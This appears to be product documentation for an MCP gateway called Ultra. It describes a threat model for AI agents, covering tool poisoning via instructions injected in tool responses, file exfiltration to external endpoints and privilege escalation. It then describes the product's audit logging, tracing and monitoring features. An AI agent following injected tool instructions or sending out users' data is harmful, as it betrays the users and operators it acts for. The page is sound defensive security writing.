The MCP Threat Model
MCP servers grant AI agents access to sensitive systems. Without a security layer, several risks emerge:Tool Poisoning
A malicious or compromised MCP server could return crafted responses that influence AI agent behavior. For example, a tool response could include instructions that manipulate the agent into calling other tools with unintended parameters.Data Exfiltration
An AI agent with access to both a filesystem server and an HTTP server could read sensitive files and send their contents to an external endpoint — all within a single conversation.Privilege Escalation
MCP servers often run with the user’s full permissions. An AI agent that convinces a server to execute arbitrary commands effectively has the user’s privileges.Uncontrolled Tool Access
Without policy controls, any AI agent can call any tool on any connected MCP server. There’s no way to restrict which tools are available to which contexts.Compliance Gaps
In regulated environments, there’s no built-in audit trail for what AI agents do. When an agent modifies a production database or accesses customer data, who knows?What Ultra Provides Today
Ultra addresses these risks with a visibility-first approach:Complete Audit Trail
Every MCP operation is recorded — tool calls, resource reads, prompt requests. The audit log captures who did what, when, and the full request/response payloads. The audit interceptor fails closed to ensure no operation goes unrecorded.Distributed Tracing
OpenTelemetry-compatible traces with W3C Trace Context IDs. Correlate MCP operations with your existing observability stack. Know exactly what an AI agent did during a session.Real-Time Monitoring
The web dashboard provides live visibility into MCP traffic. See which tools are being called, which servers are active, and whether operations succeed or fail.Centralized Visibility
Ultra Hub aggregates traces and audit events from all gateways across your organization. One dashboard for all MCP activity, across all developers and environments.Client Identity Tracking
Ultra identifies which MCP client (Claude Desktop, Cursor, VS Code, etc.) made each request, providing context for security analysis.What’s Coming
Ultra’s architecture is designed for policy enforcement. The pipeline’s interceptor pattern supports adding new processing stages without changing existing code.Policy Engine (Planned)
An OPA/Rego-based policy engine that evaluates rules before requests reach upstream servers. This will enable:- Tool-level access controls (which tools can be called)
- Parameter validation (what arguments are acceptable)
- Rate limiting (how often tools can be called)
- Context-based policies (different rules for different workspaces)
The Honest Assessment
Ultra today provides observability, not enforcement. You can see everything that happens, but you can’t yet block specific actions. We believe this is the right starting point:- You can’t secure what you can’t see. Most organizations don’t even know what their AI agents are doing. Ultra fixes that immediately.
- Audit trails have immediate compliance value. Even without enforcement, a complete audit log satisfies many regulatory requirements.
- Observability informs policy. Understanding actual usage patterns is essential for writing effective policies. Block-first approaches tend to break workflows.